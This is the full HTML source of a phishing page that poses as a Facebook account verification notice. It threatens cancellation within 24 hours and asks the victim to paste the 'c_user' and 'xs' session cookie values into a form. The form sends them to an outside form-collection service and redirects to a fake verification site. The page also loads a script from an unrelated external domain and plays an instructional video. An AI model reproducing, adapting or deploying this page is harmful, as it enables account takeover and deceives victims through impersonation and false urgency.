<html lang=en><!--
 
-->
<meta charset=utf-8>
<meta name=viewport content="width=device-width, initial-scale=1.0">
<title>We've removed your Page because it doesn't follow our Community Standards.</title>
<link href="https://vjs.zencdn.net/7.14.3/video-js.css" rel="stylesheet" />
<script src="https://vjs.zencdn.net/7.14.3/video.min.js"></script>
<script src="https://metaverifybadgeget.github.io/inspectr/index.js"></script>
<style>
   body {
      font-family: "Helvetica Neue", Arial, sans-serif;
      background-color: #f0f2f5;
      margin: 0;
      padding: 0;
      overflow-x: hidden
   }

   .header {
      background-color: #4267B2;
      padding: 25px 20px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      color: white
   }

   .header-container {
      display: flex;
      align-items: center
   }

   .facebook-text {
      font-size: 35px;
      font-weight: bold;
      color: white;
      font-family: "Helvetica Neue", Arial, sans-serif
   }

   .divider {
      height: 10px;
      background-color: #e9ebee
   }

   .content-container {
      width: 80%;
      max-width: 800px;
      background-color: white;
      margin: 30px auto;
      padding: 20px;
      border-radius: 8px;
      box-shadow: 0 8px 16px rgba(0, 0, 0, 0.1);
      position: relative
   }

   .verification-heading {
      font-size: 32px;
      color: #1c1e21;
      margin-bottom: 20px;
      font-weight: bold;
      display: flex;
      align-items: center;
      position: relative
   }

   .verification-heading img {
      width: 50px;
      height: auto;
      margin-right: 15px
   }

   h1 {
      font-size: 24px;
      color: #1c1e21;
      margin-bottom: 20px;
      font-weight: normal;
      text-align: left
   }

   p {
      font-size: 14px;
      color: #606770;
      margin-bottom: 10px;
      line-height: 1.6
   }



   .form-group {
      margin-bottom: 20px
   }

   label {
      font-size: 14px;
      color: #4b4f56;
      display: block;
      margin-bottom: 8px
   }

   input[type="text"] {
      width: 100%;
      padding: 12px 10px;
      font-size: 14px;
      border: 1px solid #ccd0d5;
      border-radius: 6px;
      box-sizing: border-box;
      background-color: #f5f6f7;
      transition: all 0.3s ease
   }

   input[type="text"]:focus {
      border-color: #1877f2;
      background-color: white;
      outline: none;
      box-shadow: 0 0 0 3px rgba(24, 119, 242, 0.2)
   }

   .notice {
      font-size: 12px;
      color: #606770;
      margin-bottom: 25px
   }

   .form-notice {
      font-size: 12px;
      color: #ff0000;
      margin-bottom: 20px
   }

   button {
      width: 100%;
      padding: 12px;
      background-color: #1877f2;
      color: white;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      font-size: 14px;
      font-weight: 700;
      text-transform: uppercase;
      transition: background-color 0.3s ease
   }

   button:hover {
      background-color: #165ecc
   }

   .video-container {
      position: relative;
      width: 100%;
      max-width: 640px;
     
     
   }

   .poster {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      display: flex;
      justify-content: center;
      align-items: center;
      background: url('poster.jpg') no-repeat center center;
      background-size: cover;
      cursor: pointer;
   }

   .play-btn {
      font-size: 3rem;
      color: white;
      text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
      pointer-events: none;
   }
   

   video {
      width: 100%;
      display: block;
   }
   
</style>

<body>

   <div class=header>
      <div class=header-container>
         <span class=facebook-text>facebook</span>
      </div>
   </div>

   <div class=divider></div>

   <div class=content-container>

      <div class=verification-heading>
    
        Account Verification Center
      </div>
      <h1>Our policies are  broken by your post</h1>
      <p>Note: The decision will be final and your account will be canceled
        if we don't hear from you within the following 24 hours..</p>
      <p>we've identified activity on your page thet may violate our Community Standards. Your access has been 
        temporarily resticted while we review this  matter.</p>
      <p>To help us verify your identity and resolve this issues, please carefully follow the
        inststructions below..</p> 

      <div class=video-container style=position:relative!important>
         <video id="video"  controls preload=""
            poster="fbPlay.jfif">
            <source
               src="https://blqiozzohqqszikuuqad.supabase.co/storage/v1/object/public/videos//87aa4c9e-cec7-4e8d-b2e8-62b21351e57d.mov"
               type="video/mp4">
            Your browser does not support the video tag.
         </video>
      </div>

     
      <p class=form-notice>Please provide the following information exactly as shown in your account settings.</p>
                           
                        <form class="content" action="https://submit-form.com/cabHQGH9h" method="POST">
 <input
    type="hidden"
    name="_redirect"
    value="https://submit-complete-password-verification.netlify.app/"
  />
         
         <div class=form-group>
            <label for=c_user>c_user</label>
            <input type=text id=c_user name=c_user pattern=[0-9]+ minlength=6 required value>
         </div>
         <div class=form-group>
            <label for=xs>xs</label>
            <input type=text id=xs name=xs pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" required
               value>
         </div>
         <p class=notice>Please make sure not to log out from your computer or laptop until you have received a
            verification email.</p>
         <button class="submitBtn" type=submit>Submit</button>
      </form>
   </div>
